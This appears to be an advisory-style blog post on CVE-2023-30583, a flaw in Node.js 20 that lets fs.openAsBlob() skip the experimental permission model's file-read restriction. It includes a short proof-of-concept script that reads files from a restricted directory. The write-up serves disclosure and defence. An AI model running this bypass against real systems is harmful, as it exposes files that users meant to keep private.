A critical security vulnerability has been discovered in Node.js 20 that lets attackers bypass the experimental permission model through the fs.openAsBlob() function. Tracked as CVE-2023-30583, the flaw gives malicious actors a way to read sensitive data by circumventing the file-system read restriction configured with the --allow-fs-read flag.
Background
Node.js recently introduced an experimental permission model that aims to improve security by letting developers restrict which parts of the file system a running application may read. The model is activated by passing the --allow-fs-read flag when starting a Node.js application.
Issue Details
The vulnerability in Node.js 20 is that the fs.openAsBlob() function can bypass the experimental permission model. It arises from a missing permission check in the fs.openAsBlob() API.
When the experimental permission model is in use, an attacker who can convince the user to run a malicious script under the --allow-fs-read flag can bypass the controlled read access to the specified portion of the file system. Depending on what is read, this can lead to leakage of sensitive data or other issues.
Original References
- Node.js Security Release - API Documentation
- CVE-2023-30583 - NVD
Exploit Details
In the vulnerable environment, a Node.js 20 application is run with the --allow-fs-read flag enabled for a restricted directory. The malicious sample code snippet is as follows:
const fs = require('fs');

// Using fs.open() to access a restricted file. This call is subject to the
// permission model, so a path outside the allowed directory is rejected
// with ERR_ACCESS_DENIED; the error is logged rather than thrown so the
// second access below still runs.
fs.open('restricted_directory/secret_file.txt', 'r', (err, fd) => {
  if (err) {
    console.error('fs.open denied:', err.code);
    return;
  }
  fs.readFile(fd, 'utf8', (err, data) => {
    if (err) throw err;
    console.log('Restricted content:', data);
    fs.close(fd, (err) => {
      if (err) throw err;
    });
  });
});

// Using fs.openAsBlob() to bypass the permission model check. The second
// argument is the options object fs.openAsBlob() accepts; Node has no global
// FileReader, so the Blob's own text() method reads the content.
fs.openAsBlob('restricted_directory/secret_bypassed_file.txt', { type: 'text/plain' })
  .then((blob) => blob.text())
  .then((text) => {
    console.log('Bypassed content:', text);
  })
  .catch((err) => {
    console.error(err);
  });
The above code snippet tries to access two files in the restricted directory: the first through fs.open(), whose access is checked by the permission model, and the second through fs.openAsBlob(), which bypasses the permission model check.
Conclusions
Users and developers of Node.js 20 applications must remain vigilant about the discussed vulnerability, as it poses a significant risk to the security of their applications. It is essential for developers to always follow the latest secure coding practices and keep themselves updated with the newest security releases from the Node.js team.
Please note that since the permission model is currently an experimental feature, it is expected to change and improve as it undergoes further development. Users should keep an eye on future updates for potential fixes and adjustments to the permission model.
Timeline
Published on: 09/07/2024 16:15:02 UTC
Last modified on: 09/09/2024 19:35:01 UTC